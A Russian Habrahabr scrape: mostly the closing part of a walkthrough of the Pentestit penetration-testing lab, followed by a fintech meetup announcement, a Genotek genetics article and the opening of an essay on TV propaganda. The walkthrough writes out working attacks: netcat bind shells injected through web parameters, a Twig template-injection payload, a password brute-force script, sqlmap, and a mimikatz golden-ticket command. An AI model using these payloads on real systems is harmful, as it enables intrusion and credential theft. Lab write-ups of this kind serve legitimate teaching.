В начале мы делаем remote port forwarding, пробрасывая remote часть «localhost:80» (то есть то, что у на нашей локальной Kali машине находится на порту 80) на локальный (для SSH сервера) порт 8765. Вызвать эту командную строку ssh> можно нажатием комбинации клавиш ~C (удерживая shift нажимем ~ и затем C).
Теперь наш локальный вебсервер доступен нам на хосте SSH. На сервере по умолчанию включен прокси сервер, для локального порта его стоит убрать командой unset .
Теперь все готово, чтобы запускать наш скрипт:
В папке /data/users/rross/docs/ найден токен и SSH-ключ rross-a. Кроме того, мы еще нашли SSH-ключ пользователя a.modlin. Наверняка один из них подойдет к ssh-test. Продолжим! Разбираемся с ssh-test
Когда мы нашли токен mail , нам стала доступна версия приложения «gds-authenticator»: .
Как видно из письма, адресованного Альфреду Модлину, ему понадобится два фактора для входа на сервер — ключ или пароль, и номер порта SSH, который постоянно меняется. Эффективность второго фактора весьма сомнительна, потому что открытый порт можно просто найти с помощью nmap, но тем не менее мы сделаем эту задачу предполагаемым авторами способом. Распакуем apk и извлечем classes.dex:
Затем сконвертируем dex в jar с помощью одноименной утилиты:
И, наконец, воспользуемся декомпилятором JD , чтобы получить исходники: protected void setAuthCode()
{
String str = new HOTP().gen("WFLHQEBMJ3XLPDOY", (int)Math.floor(System.currentTimeMillis() / 1000L / 30L), 6);
int i = Integer.parseInt(str.substring(-5 + str.length()));
if (i > 65534) {
i %= 65534;
}
TextView localTextView = (TextView)findViewById(2131492983);
Object[] arrayOfObject = new Object[1];
arrayOfObject[0] = Integer.valueOf(i);
localTextView.setText(String.format("%d", arrayOfObject));
}
Как видим, используется класс HOTP, также доступный в apk, которому дается seed и миллисекунды для вычисления. Попробуем извлечь код, который генерирует номер порта, чтобы научиться делать это, при желании, автоматически.
И затем скомпилируем и запустим:
Порт есть, осталось написать команду, которая будет подключаться к ssh test одной строкой. Скопируем /data/users/a.modlin/docs/key в локальную папку, а затем воспользуемся sshuttle, чтобы сделать внутреннюю сеть доступной с нашей Kali-машины.
sshuttle (который еще называют a poor man's VPN) использует правила iptables, чтобы сделать внутренние подсети доступными через ssh-туннели. Подключаемся таким образом:
Сделаем bash-скрипт для подключения: #!/bin/sh
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i key [email protected] -p$(java Main)
Подключаемся и находим очередной токен: Атакуем blog
Судя по схеме сети, по адресу 192.168.0.4 находится блог компании, беглое сканирование портов подтвержает присутствие открытого 80-го порта. Подключаемся через sshuttle и посмотрим, что можно найти на блоге:
Выглядит похоже на инсталляцию Joomla! Проверим:
Так и есть. Попробуем нашумевшую недавно уязвимость в Джумле , которая позволяет создать учетную запись администратора без аутентификации. Можно воспользоваться эксплоитом по ссылке, а можно, например, модулем из Metasploit:
Теперь просто заходим под нужным пользователем:
Находим неопубликованную статью:
И используем ее алиас в виде токена, и блог поддался! Разбираем captcha
Сервер с капчей по адресу 192.168.0.7 предлагает не очень много — только пустую страницу с незагрузившейся картинкой. Немного поизучав исходный код основной
страницы (предварительно подключившись к ssh с помощью sshuttle), можно сделать следующие выводы: Картинка генерируется в подпапке sources с псевдослучайным именем
Имя подпапки сохраняется для каждой сессии, и генерируется заново для новой сессии (это понятно если поменять PHPSESSID)
Сама по себе картинка не работает — видимо, какая-то старая забытая development версия
Ничего из этого не дает прямых указаний о том, что делать дальше. Воспользовавшись dirsearch, находим кое-что интересное:
Исходя из содержимого robots.txt понимаем, что есть какой-то скрытый bak файл, в котором, видимо, и есть самое интересное.
При этом readme.txt говорит о том, что картинка удаляется через некоторое время после того, как она была сгенерирована.
Возьмем путь к картинке из основной страницы: http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/captcha.png
Так как мы ищем скрытый bak файл, попробуем заменить расширение png на bak: http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/captcha.bak
Видимо, это резервная копия исходного кода, которая говорит о том, что есть файл captcha с сериализованной сессией, и файл с бекдор-шеллом, который принимает команды в GET-параметре session и выполняет их.
К сожалению, если зайти еще раз — файла больше нет. Куда он делся? Вспоминаем readme.txt: он удаляется через некоторое время. После нескольких попыток понимаем, что файл становится доступен снова после захода на /index.php. Сделаем небольшой цикл, который будет это делать для нас постоянно, чтобы держать captcha.bak и остальные файлы доступными: while true; do curl -i -s -k -b 'PHPSESSID=et07feiohsrnaf11n0kt31rf83' http://192.168.0.7/; done
Файл снова на месте. Остается обратиться к ($_SESSION.php)?session=whoami чтобы убедиться, что мы получили возможность удаленного выполнения кода:
Теперь сделаем bind shell на хосте 192.168.0.7 на порту 1234: http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/($_SESSION).php?session=nc -e /bin/sh -nvlp 1234
И подключимся к нему:
Вот и очередной токен! Взятие hall-of-fame
Изучив открытые порты на 192.168.0.8 обнаруживаем сайт с описанием известных хакеров и возможностью входа:
Полезно начать с изучения карты сайта, доступных и скрытых каталогов, и попыток определить доступных пользователей. К сожалению, login-форма не работает на известных именах.
Внимание привлекают адреса адреса вида http://192.168.0.8/index.php?hname=James , так как параметр может оказаться примером уязвимости типа LFI (local file inclusion), но попытки ее эксплуатировать подставив системные пути не приводят к успеху. Обратимся к dirsearch и попробуем найти скрытые директории:
Среди прочего, нашелся интересный файл: /backup/passwords.txt, и подпапка /dev, закрытая за basic-аутентификацией. Воспользуемся этими паролями на login-странице:
После логина, получаем пароль к /dev части. Воспользуемся им, чтобы зайти в /dev:
Внутри получаем копию внешнего сайта, но на ней подозреваемый ранее параметр hname уязвим к Server-Side Template Injection . Как видно, вписав {{7*7}} мы получаем результат операции (49) в заголовке страницы — который был вычислен на сервере. Мы получили RCE.
Саму атаку можно детально изучить по ссылке выше, а мы попробуем составить payload для того, чтобы создать bind shell. Для начала уточним имя пользователя: А затем с помощью следующей команды откроем bind shell:
http://192.168.0.8/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -nvlp 1234 -e /bin/sh")}}
Подключившись, находим очередной токен! Читаем news
news (192.168.0.5) — очередной сайт в Global Data Security, внешне похожий на hall of fame, с возможностью регистрации, входа, восстановления пароля и изучения внутренних новостей.
Логин форма предлагает нам ввести имейл и пароль.
Попробовав все известные комбинации логина и пароля уже найденных пользователей (a.modlin, e.lindsey, etc.), понимаем что они не зарегистрированы — мы получаем сообщение wrong e-mail. При этом, попытка ввести [email protected] приводит к другому сообщению: wrong password. Значит, пользователь [email protected] зарегистрирован.
Вооружившись Burp Suite, пробуем подобрать пароль к [email protected], но это не приводит к успеху. Тогда снова обратимся к dirsearch и поищем что еще скрывается на сайте новостей:
Находим папку /old, а в ней старую версию сайта новостей, в которой есть интересный комментарий, который намекает на существование «простого пользователя», то есть user:
Проверим наши догадки. Логин в /old не приводит ни к чему интересному, а вот если зайти под [email protected] с паролем user в новый сайт новостей, видим следующую страницу:
Отлично, осталось зайти под администратором, чтобы получить токен. Мы только что узнали о существовании новой страницы — user_info.php, посмотрим что есть на этот счет в /old.
После нескольких попыток, понимаем, что если попробовать залогиниться под пользователем admin используя этот адрес, то войти не получится, но вывод user_info.php изменится: http://192.168.0.5/old/login_2.php?username=admin&password=admin
То есть, на самом деле мы вошли! Однако новый user_info.php теперь все равно не дает нам попасть внутрь.
Из этого можно заключить, что два сайта используют одну и ту же сессию, и сохраняют в ней информацию о пользователе. Видимо, попытка войти в /old сохраняет в поле username в сессии имя пользователя, и просто не редиректит на user_info.php если пароль неправильный (вместо того чтобы сохранять имя пользователя только после успешного входа с правильным паролем). И хотя для сайта /old этого достаточно, новый еще использует email, поэтому зайти на user_info.php не получается.
Попробуем сбросить пароль для пользователя admin: http://192.168.0.5/[email protected]
Понадеявшись на то, что в форме сброса пароля программист допустил ту же ошибку (а именно, сохранил в сессии имейл) мы пробуем нам сохранить в сессии правильный email для того, чтобы войти под администратором.
Итого, весь процесс состоит из следующих шагов: http://192.168.0.5/login_2.php?email=user%40gds.lab&password=user — входим под [email protected]/user в новый сайт
http://192.168.0.5/old/login_2.php?username=admin&password=user — устанавливаем значение «admin» в качестве текущего пользователя
http://192.168.0.5/[email protected] — устанавливаем значение «[email protected]» в качестве текущего email-адреса
http://192.168.0.5/user_info.php — мы вошли под администратором
После успешного входа, получаем токен (вырезан на скриншоте ниже):
И вот, новости поддались! Получаем web-control
Начнем, как обычно, со сканирования портов, для чего воспользуемся nmap, удобно предоставленным нам на хосте SSH.
Изучив 80-й порт, не находим ничего интересного кроме формы для сбора имейлов, которая, к тому же, не работает, и папки /uploads, в которой ничего интересного найти не удалось.
Обратим внимание на нестандартный порт 1503. Чтобы его изучить, попробуем подключиться: nc 192.168.0.6 1503
Видимо, нужно подобрать комбинацию логина и пароля. Попробовав известные нам пароли с ssh, hall-of-fame и mail понимаем что все не так просто, и придется написать небольшой скрипт: """Sockets"""
import socket
WEB_CONTROL_HOST = '192.168.0.6'
WEB_CONTROL_PORT = 1503
USER_FILE = '/root/pentestit/webc/users.txt'
PASS_FILE = '/opt/SecLists/Passwords/john.txt'
def recv_until(string, sock):
"""Receives data from socket until certain string is found"""
data = ""
while True:
tmp = sock.recv(1)
if tmp == "":
break
data += tmp
if data.endswith(string):
break
return data
def attempt_login(user, password):
"""Attempts to log in under a specified account"""
# This should not connect every time and should be multi-threaded in an ideal world
web_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
web_control.connect((WEB_CONTROL_HOST, WEB_CONTROL_PORT))
reply = recv_until("Enter login: ", web_control)
web_control.send(user)
reply = recv_until("Enter password: ", web_control)
web_control.send(password)
reply = web_control.recv(6)
web_control.close()
return "Error!" not in reply
with open(USER_FILE) as user_file:
for user_line in user_file:
with open(PASS_FILE) as pass_file:
for pass_line in pass_file:
if attempt_login(user_line, pass_line):
print "Success: " + user_line.rstrip('\n') + ":" + pass_line.rstrip('\n')
В качестве пользователей выпишем известные нам учетные записи с ssh, и несколько стандратных имен: admin
administrator
root
user
k.barth
m.howard
g.leone
j.wise
s.locklear
e.lindsey
a.modlin
Запускаем скрипт на выполнение, и через некоторое время получаем желаемый результат:
Получилось! После с нужным логином и паролем, понимаем что мы оказались в самописном инструменте для запуска каких-то скриптов.
Множество уязвимостей связано с плохо проверенным пользовательским вводом, попробуем добиться command injection. Если ввод передается в system, мы можем добавить дополнительную команду с помощью разделителя — ;, &, или |. Попробуем!
Фильтруется все кроме |, что, видимо, было упущено разработчиками. Используя команду | nc -nvlp 1234 -e /bin/sh создаем bind shell на web-control. Теперь остается только подключиться и найти токен: nc 192.168.0.6 1234
cat /var/opt/token.txt
Токен store
Как видно по схеме сети, store представлен двумя хостами — 172.16.0.4 (production), и 172.16.0.5 (dev). Кроме того, копия магазина находится на хосте ssh в папке /var/www/.
Изучив содержимое /var/www делаем следующие выводы: используется последняя версия OpenCart, в которой нет известных уязвимостей
в /var/www/config.php находим пароль к локальной БД, на которой установлена копия магазина; в ней находим хеш пароля пользователя admin — пока он наша единственная надежда.
В hashcat недавно даже появилась возможность подбирать хеши формата OpenCart. Попробуем:
К сожалению, подобрать пароль не удается даже на достаточно большом словаре.
Переключим внимание на store и dev-store — возможно в них есть дополнительный скрытый файл, или используется старая, уязвимая версия OpenCart. Через некоторое время обнаруживаем SQL-инъекцию на машине dev-store, которой не было на ssh или store — видимо, на этом сервере осталась старая версия с уязвимостью .
Для проверки, поменяем hosts файл добавив запись: 172.16.0.5 store.gds.lab
И запустим SQLmap: sqlmap -u 'http://store.gds.lab/index.php?route=product/product&product_id=53*' --sql-shell
Мы получили доступ к базе данных на dev-store. К сожалению, доступ к файловой системе ограничен (прочесть /etc/passwd или записать что-то в файл через OUTFILE не получается), поэтому, видимо, токен находится прямо в базе.
И вот, store взят! Изучаем win-term
Чтобы продвинуться дальше, участникам понадобилось больше четырех дней, хотя, как обычно, ларчик просто открывался. На текущий момент нераскрытыми остались три токена — win-term, win-dc0 и cloud .
Просканировав порты на Windows терминале и контроллере домена (DC0), понимаем что никаких дополнительных сервисов не открыто, версия Windows — 2008 R2, и известных публичных уязвимостей, позволяющих получить code execution нет. Несмотря на это, мы можем определить что обновления давно не устанавливались, так как машмну win-term можно перезагрузить с помощью уязвимости в RDP . Это значит, что вероятно повысить привилегии до администратора после входа на машину будет не так сложно.
Перебор паролей по словарю тоже не дает желаемого результата ни на одной из учетных записей. На всякий случай убеждаемся, что найденные ранее учетные данные существуют в домене:
Все на месте. На данном этапе у нас есть пароли двух пользователей — a.modlin и e.lindsey. Попробуем модифицировать пароль e.lindsey таким образом, чтобы он соответствовал стандартным доменным политикам, и содержал большие и маленькие буквы, и цифры. Начнем с того, что сделаем первую букву пароля e.lindsey заглавной: rdesktop 192.168.0.3 -u "GDS-OFFICE\\e.lindsey" -p "**********" -r disk:share=/root/pentestit/term -r clipboard:PRIMARYCLIPBOARD
Удалось подключиться! Попробуем повысить привилегии до администратора с использованием известной уязвимости MS16-023 . Я скомпилировал этот код в виде exe file, но можно выполнить и через PowerShell. Запускаем:
В полученной консоли администратора создаем отдельного пользователя, удаляем за собой лишние файлы, и заходим под локальным администратором: rdesktop 192.168.0.3 -u "TermAdmin" -p "Admin123" -r disk:share=/root/pentestit/term -r clipboard:PRIMARYCLIPBOARD
У администратора находим скрипт подключения зашифрованного диска с помощью TrueCrypt с ключом. Запускаем:
На появившемся диске X есть база KeePass, опять же с ключом:
А в ней — пароль от учетной записи rross к cloud, и долгожданный токен: Получаем права администратора домена в win-dc0
Продолжая изучать содержимое терминала, мы находим папку с бекапом диска доменного контроллера:
Подключим VHD файл в консоли управления сервером:
Затем скопируем файл Windows\NTDS\Ntds.dit и Windows\System32\config\SYSTEM с только что подключенного VHD на локальную kali-машину.
Прежде чем продолжить, нужно подготовиться, установив специальные утилиты для работы с таблицами NTDS.dit: libesedb и NTDSXtract . Можно установить их в /opt таким образом: cd /opt
git clone https://github.com/libyal/libesedb.git
cd libese/
apt-get install git autoconf automake autopoint libtool pkg-config build-essential
./synclibs.sh
./autogen.sh
./configure
make
make install
cd ..
git clone https://github.com/csababarta/ntdsxtract.git
Теперь все готово. В первую очередь, извлечем таблицы из ntds.dit с помощью esedbexport :
В появившемся каталоге ntds.dit.export воспользуемся NTDSXtract чтобы извлечь хеши:
В результате выполнения этой команды, получим файл nt.john.out с извлеченными хешами в новой папке dump/:
Иногда на этом можно остановиться, если можно восстановить пароль из извлеченного хеша администратора. В данном случае, так как это резервная копия, пароль уже не подходит. Поэтому воспользуемся атакой Pass the Ticket (ptt), в которой мы используем хеш учетной записи krbtgt для генерации так называемого golden ticket.
Для этого загрузим mimikatz на терминал, и запустим его с правами администратора:
Для создания golden ticket нам потребуется SID домена (получен с помощью команды lsadump::lsa на скриншоте выше), имя учетной записи администратора домена (получено из NTDS.dit), хеш учетной записи krbtgt (также получен выше) и имена групп, в которые входит администратор (стандартные значения: 500, 501, 513, 512, 520, 518, 519).
Используя эту информацию, создадим golden ticket и применим его: kerberos::golden /domain:gds-office.lab /sid:S-1-5-21-421115581-889488229-2938181853 /rc4:1dc9bae0282962e7d761a2eda274e6d7 /id:500 /user:administrator /groups:500,501,513,512,520,518,519 /ptt
Затем запустим отдельный cmd.exe с примененным тикетом, и получим доступ к ресурсу C$ на контроллере домена:
Вот и токен! На данный момент мы обладаем полными правами администратора домена на этом диске, а соответственно можем выполнять произвольный код на контроллере домена, что обычно ознаменовывает успешный финал любого пентеста.
В данном случае атака была сильно упрощена — имелась резервная копия дисков контроллера домена, отсутствовало активное обнаружение атак, включая тот же mimikatz, а так же отсутствовали необходимые патчи. Последний рубеж — cloud
Начинаем как обычно со сканирования портов:
Обнаружив службу SSH на порту 2222 пробуем зайти туда с учетной записью rross и паролем, найденным на терминале. Примечание Эта цепочка в лаборатории была довольно запутанной, потому что нам изначально был доступен сервер ownCloud с учетной записью администратора (как обсуждалось в начале статьи), веб-сервер был неправильно сконфигурирован, и можно было скачать sqlite базу данных ownCloud (http://cloud.gds.lab/data/owncloud.db), из которой можно было извлечь хеш не поддающийся перебору (соль сохранена на диске и мы не имеем к ней доступа). При этом, SSH-ключ пользователя rross был найден уже давно, во время перебора содержимого /data/users/ на хосте SSH, но, к сожалению, не подошел. Так как на порту 2222 включена аутентификация по паролю, можно было попробовать определить какие пользователи присутствуют на компьютере rross с помощью атаки user enumeration timing attack. Для этого можно использовать инструмент osueta .
Эта утилита отправляет пароли длиной 40 тыс символов и замеряет разницу в ответах от сервера — если пользователь существует, то OpenSSH вычисляет хеш пароля, а если пользователя нет — то сразу возвращается ответ с негативным результатом аутентификации. В текущей версии OpenSSH этот недочет исправлен, но тем не менее уязвимость присутствует во многих конфигурациях, и позволяет значительно сократить время на подбор пароля.
В любом случае, после успешного получения токена win-term у нас есть пароль, с которым можно зайти на SSH.
Интересно, что каждый раз когда мы попадаем на сервер, мы попадаем в разный lxc-контейнер — от lxc1 до lxc5.
После изучения, становится понятно, что нужно поднимать привилегии, потому что с привилегиями пользователя rross ничего интересного не доступно.
На lxc1 допущена классическая ошибка в управлении правами:
Скрипт clear_nginx_logs.sh регулярно запускается с правами root, при этом его можно модифицировать любому пользователю. Создадим нового пользователя в системе:
Здесь мы добавляем нового пользователя в /etc/passwd с именем ff и паролем 123 (захешированном в устаревшем формате, для простоты) с id равным 0 (root). Через минуту заходим под этим пользователем и получаем полный доступ к контейнеру:
Пользователь добавлен, но токена в контейнере все равно нет — нужно выйти за пределы контейнера. Недавно NCC Group опубликовали исследование по этому поводу. Пример на странице 16 — это эксплоит, применив который можно получить доступ к файловой системе хостовой машины.
Скомпилируем и запустим файл на контейнере:
И наконец — финал, последний токен в файле token.txt на хостовой машине:
Последний токен взят!
Обратим внимание на файл ntdsutil_snapshot.zip — скопировав его на локальный компьютер можно получить резервную копию файлов ntds.dit и SYSTEM еще одним способом. Включим локальный SSH сервис, и сделаем его доступным на контейнере: service ssh start
Затем сделаем remote port forwarding через SSH:
И скопируем файл через scp:
Распаковав его, получим те же ntds.dit и SYSTEM для win-dc0:
Лаборатория пройдена!
Весь материал здесь представлен исключительно в образовательных целях, поэтому ваши комментарии по прохождению лаборатории приветствуются — пусть как можно больше людей узнают о разных способах решения той или иной задачи.
Тем, кто еще не успел пройти лабораторию и испытать радость взятия каждой машины в сети, желаю удачи.
Хочу поблагодарить Pentestit за прекрасную лабораторию — было интересно, и поблагодарить читателя за то, что дошли до этого момента.
Спасибо! Ждем 11-ю лабораторию в мае 2017-го года. | https://habrahabr.ru/company/defconru/blog/317322/ |
habrahabr | Митап TechTalks от EXANTE и ВШЭ | ['митапы', 'митап', 'финансы', 'брокер', 'api'] | Завтра, 15 декабря, мы вместе с ВШЭ проведем наш второй митап TechTalks по market data и всему, что с ней связано. Как получать котировки? Какие протоколы и API для этого лучше подходят? Об этом... | Завтра, 15 декабря, мы вместе с ВШЭ проведем наш второй митап TechTalks по market data и всему, что с ней связано. Как получать котировки? Какие протоколы и API для этого лучше подходят? Об этом расскажут самые технологичные умы, профессионалы «с обеих сторон» индустрии – со стороны брокеров и трейдеров. Что именно обсудим? Брокерские протоколы обмена информацией (API, FIX, Plaza);
Доступность данных для различных типов инвесторов;
Зарождающуюся революцию Big Data в области биржевых данных.
Кто будет говорить?
Сергей Рубанов, руководитель фронтенд-разработки в EXANTE, и как он сам себя называет JavaScript-самурай, выступит на тему «Real-time данные на фронтенде».
Исполнительный директор EXANTE, программист и математик, Анатолий Князев проведет панельную дискуссию по автоматизации передачи данных. В ней участвуют: Валерий Макеев, руководитель отдела разработки ПО в инвестиционной компании «Форум». Занимается проектами по автоматизации торговли и моделированию инвестиционного портфеля.
Андрей Артышко, генеральный директор «Лаборатория торговых систем», создатель TSLab, на финансовых рынках работает с 2003 года.
Павел Корякин, соучредитель IT Global. Компания занимается заказной разработкой и ведёт собственный проект, платформу для торговли опционами. До этого работал в option.ru, на Московской бирже и в компании CQG.
Где встретимся?
В здании ВШЭ на ул. Б. Ордынка, д. 47/7 Когда?
Четверг, 15 декабря, с 19:30 до 22:30 Что еще интересного?
Конечно же, живое неформальное общение и вкусные угощения. Регистрируйтесь по ссылке , участие бесплатно. Для тех, кто не сможет присутствовать лично, будем вести онлайн-трансляцию. Чтобы подключиться к стримингу, тоже регистрируйтесь, завтра всем вышлем ссылку.
Если все еще сомневаетесь, посмотрите самые интересные моменты прошлого митапа FinTech Moscow . Тогда мы собрали лучших экспертов финтеха и обсудили наиболее интригующие темы: блокчейн, криптовалюты, глубокое обучение, «космические технологии» в финансах.
Ждем на TechTalks! | https://habrahabr.ru/company/exante/blog/317596/ |
habrahabr | Тектоника российской популяции | ['популяционная генетика', 'история', 'гены', 'родственники'] | Россия – лоскутное одеяло, сшитое из кусочков ткани разного цвета, фактуры и материалов. Российская федерация не просто самая большая страна в мире по занимаемой территории, это еще и огромный... | Россия – лоскутное одеяло, сшитое из кусочков ткани разного цвета, фактуры и материалов. Российская федерация не просто самая большая страна в мире по занимаемой территории, это еще и огромный плавильный котел, в который попали представители самых разных этнических групп (перепись населения 2010 года насчитывает более 200). Кто или что объединяет все эти кусочки вместе? Ломоносов и Татищев говорили, будто бы от варягов только прозвание получили свое, «русь», а прежде были славяне. Миллер и Шлёцер, немецкие историки, еще раньше говорили, что норманны основали киевскую династию. В XX веке лингвисты сформулировали теорию восхождения этнонима «рус» к ираноязычным корням, увеличив количество вопросов. Применим ли к населению России термин «российская популяция» и что за ним стоит в новом материале Genotek. Популяция русского человека
В науке существует термин популяция, которым описывают группу особей одного вида, проживающую длительное время вместе на определенной территории. Поэтому с биологической точки зрения термин «российская популяция» имеет право на существование, однако вызывает недоумение с точки зрения человека, который поражается количеству национальностей в результатах переписи населения. Действительно, состав нашего государства, равно как и распределение населения по его территории, очень неоднороден. Если рассматривать результаты переписи 2010 года как достоверный источник, можно обнаружить, что русские составляют практически 80% населения России. Впрочем, помимо русских встречаются 6 крупных национальных групп: татары, украинцы, башкиры, чуваши, чеченцы, суммарно составляя до 10% населения. Всё-таки, российская популяция существует. Блеск и нищета аллелей
Речь идет не о языке, не о культуре и не о широкой русской душе. Давайте рассмотрим и препарируем группу людей, которая живет на территории России методами популяционной генетики. Популяционная генетика человека изучает историю человечества, внимание ее сконцентрировано на судьбах великих аллелей (вариантов генов). Самые интересные закономерности, которые исследователи пытаются выяснить — распределение частот аллелей в популяциях и их изменение в ходе эволюции. Как именно это происходит, почему так, а не иначе, и кто победит — та же историческая наука, только гуманнее. Одними из ключевых понятий этой области исследования являются гаплотип и гаплогруппа. Поп-генетика
Гаплотип — это сокращение от гаплоидный генотип, совокупность аллелей тех участков хромосомы, которые обычно наследуются вместе. Как правило, половые клетки человека содержат уникальные комбинации вариантов генов, которые наши родители смешали вместе, не имея права и возможности выбирать, что достанется нам. Гаплогруппа — группа схожих гаплотипов, имеющих общего предка, у которого в обоих гаплотипах имела место одна и та же мутация — однонуклеотидный полиморфизм, как правило рассматривают гаплотипы Y-хромосомы или митохондриальной ДНК (от отца и от матери соответственно). Выбор именно этих последовательностей, с одной стороны, связан с тем, что нужно точно знать, что выбранные гены — набор от одного родителя, а не смесь. С другой стороны, мутации в этих последовательностях накапливаются и данные хромосомы не обмениваются участками ни с какими другими частями генома. Благодаря этому можно отслеживать пути миграций и говорить о степени родства тех или иных национальных групп. Свериться ориентирами
Вспомним карту расселения народностей по территории современной России. На западе издревле жили финно-угорские племена Восточной Европы. Там обитали предки саамов, эстонцев, коми, марийцев и мордвы. Центрально-европейскую часть современной России занимали славянские племена, чуть севернее — балтские племена. Глубже на северо-восток: ненцы, энцы, нганасаны, селькупы, ханты и манси. Ещё восточнее: эвенки, ламуты, удэгейцы, нанайцы, орочи, ороковы и ульчи, а также чукчи, эскимосы, коряки, ительмены, чуванцы, алеуты и нивхи. На юге были ираноязычные, монгольские племена. Помимо крупных национальных групп в России живет много малых народностей. У некоторых даже свой собственный язык, но это совсем другая история. Они уникальны, их особенность в том, что смешивание с основным населением было невелико. Нашей же целью является составление общего образа. Для этого нужно вспомнить историю всего народа. Наследить в геноме
Взлеты и падения империй, вторжения, рабство, торговля, войны, миграции — на протяжении истории у разных человеческих групп было множество причин для общения. Любые взаимодействия такого рода вызывали внезапную или последовательную передачу генетического материала, создавая популяции с примесями. В большинстве случаев генетическое наследие событий минувших тысячелетий нам неизвестно, а сведения из истории не дают описания полной картины. Хочется знать больше. Вернемся к истории русского народа. Если вспоминать моменты «масштабных смешений», на ум приходят призвание варягов и татаро-монгольское нашествие. Эти события, безусловно, повлияли на состав генома современного русского человека. Однако, попробуем отмотать историю на несколько тысяч лет назад, чтобы увидеть что-то фундаментальное. Так, если взглянуть на карту древних культур, можно получить общее представление о том, как это все было тогда. Под картинкой — расшифровка, какие гаплогруппы наиболее характерны для какой культуры. Мир тогда представляется простым и интересным, как игра в солдатиков. Каждая культура имеет определенные характерные артефакты, по имени которых она получает название (Культура колоколовидных кубков, Культура шнуровой керамики), а потом они расселяются по карте. Теперь можно еще и классифицировать их с точки зрения гаплогрупп.
Мы составили описание гаплогрупп, характерных для представителей российской популяции. В него вошли наиболее часто встречающиеся: R1a, R1b, N, G, I. R*
В 2013 году опубликовали работу о Мальчике из Мальты (ударение на последний слог), на западе от озера Байкал. Этот мальчик жил 24 000 лет назад в племени охотников на мамонтов. Генетический анализ показал, что его племя дало начало многим современным европейцам. Гаплогруппа найденных останков была названа R*. R1a считается гаплогруппой, доминирующей у носителей прото-индоевропейских языков. Это языковая группа делится на индо-иранскую, фракийскую, балтийскую и славянскую ветви. На сегодняшний день гаплогруппа R1a наиболее распространена в Восточной Европе, а также Центральной и Южной Азии, а группа R1b — в Западной Европе. Для представителей гаплогруппы R1* в целом характерны светлые глаза, светлые волосы и светлая кожа, что связано со знакомой нашим читателям мутацией в гене SLC24A5. На территории России распространены гаплогруппы и R1a, и R1b. Среди клиентов Genotek гаплогруппа R1a была обнаружена у 38%, а R1b у 9% мужчин. Изначально существовала гипотеза о том, что последний общий предок жил на Балканах или на юге Сибири в силу сильной генетической разнородности этих регионов, а затем произошло разветвление — кочевники переместились в Восточную Европу. Наиболее вероятный вариант развития событий для R1a показан на картинке. N
Представители этой гаплогруппы — потомки восточно-азиатской ветви макро-гаплогруппы, сформировавшейся в Индокитае около 20 000 лет назад. Любопытно, что данная гаплогруппа преобладает среди финнов, балтов, якутов, удмуртов, бурят. Представители гаплогруппы N встречаются повсеместно в России, часто встречаясь в районе Алтая, Саян, Монголии, Северного Китая. Они прошли с востока через всю Россию, распространяя уральские языки, и остановились в Европе. Ярослав Мудрый принадлежал к этой гаплогруппе. 13% клиентов-мужчин Genotek являются представителями этой гаплогруппы. G
На сегодняшний день гаплогруппу G можно встретить повсеместно от Западной Европы и Северо-Западной Африки до Центральной Азии и Индии. Частоты встречаемости в популяции довольно низкие — от 1 до 10%, за исключением 2 регионов — Кавказа и Центральной и Южной Италии (вместе с Сардинией). Там частоты варьируют от 15 до 30%. Гаплогруппа G восходит к ответвлению, связанному со второй большой миграцией Homo sapiens из Африки около 60 000 лет тому назад. Гаплогруппы более ранних мигрантов находят у населения островной Южной Азии и Океании, а вот путь второй миграции через Аравийский полуостров шел на Средний Восток. Главное ответвление этой гаплогруппы считается предковым состоянием для 80% современных евразийцев. Гаплогруппа G сформировалась около 50 000 лет назад как ответвление от основной. Эволюция представителей этой гаплогруппы протекала независимо, анализ ДНК показывает, что на потомков, унаследовавших эту гаплогруппу, в значительной мере повлиял эффект бутылочного горлышка . Любопытно, что Иосиф Сталин принадлежал к гаплогруппе G2a1a, этот вывод был сделан на основании данных ДНК его внука. 5% клиентов Genotek также являются представителями гаплогруппы G. I
Гаплогруппа I — старейшая гаплогруппа Европы, и, скорее всего, единственная, сформировавшаяся на этой территории. Ее носители прибыли со Среднего Востока, самостоятельная гаплогруппа сформировалась около 40 000 лет тому назад. Это была одна из гаплогрупп, распространенная среди кроманьонцев. В Европе она распадается на множество ветвей. Среди потомков разных ее ответвлений — Никола Тесла, Лев Толстой, Уоррен Баффет, Билл Клинтон, а также 17% мужчин, прошедших исследование в Genotek.
Перечисленные гаплогруппы наиболее часто встречаются у представителей российской популяции. Заметьте, ни слова об этносе и русских. Этнос — это не биологическое понятие. Самосознание, менталитет, культура — это вещи, которые зависят от генома лишь отчасти. Вы можете бурно реагировать на происходящее и иметь вспыльчивый характер, в силу особенностей работы нейромедиаторов, но ваше мировосприятие и мироощущение зависит от вашего воспитания. Узнать свое происхождение можно, пройдя ДНК-тест «Генеалогия» со скидкой 10% по промокоду GeekAncestry . Впрочем, если в душе вы татарин / башкир / поляк или мексиканец, то так тому и быть. | https://geektimes.ru/company/genotek/blog/283704/ |
habrahabr | Теории заговора. Зомбоящик | ['зомбирование населения', 'выпуски новостей', 'постоянное напряжение', 'когнитивные искажения', 'уязвимости мозга', 'телевизор'] |
Примечание. «Зомбирование» в данном контексте — многократное повторение ложной и/или неточной информации.
Среди всех когнитивных искажений человека есть большая группа, связанная с... | Примечание. «Зомбирование» в данном контексте — многократное повторение ложной и/или неточной информации.
Среди всех когнитивных искажений человека есть большая группа, связанная с переизбытком информации . Напомним, что эти искажения делятся на пять основных подгрупп:
1. Люди замечают вещи, которые уже укрепились в памяти или часто повторяются.
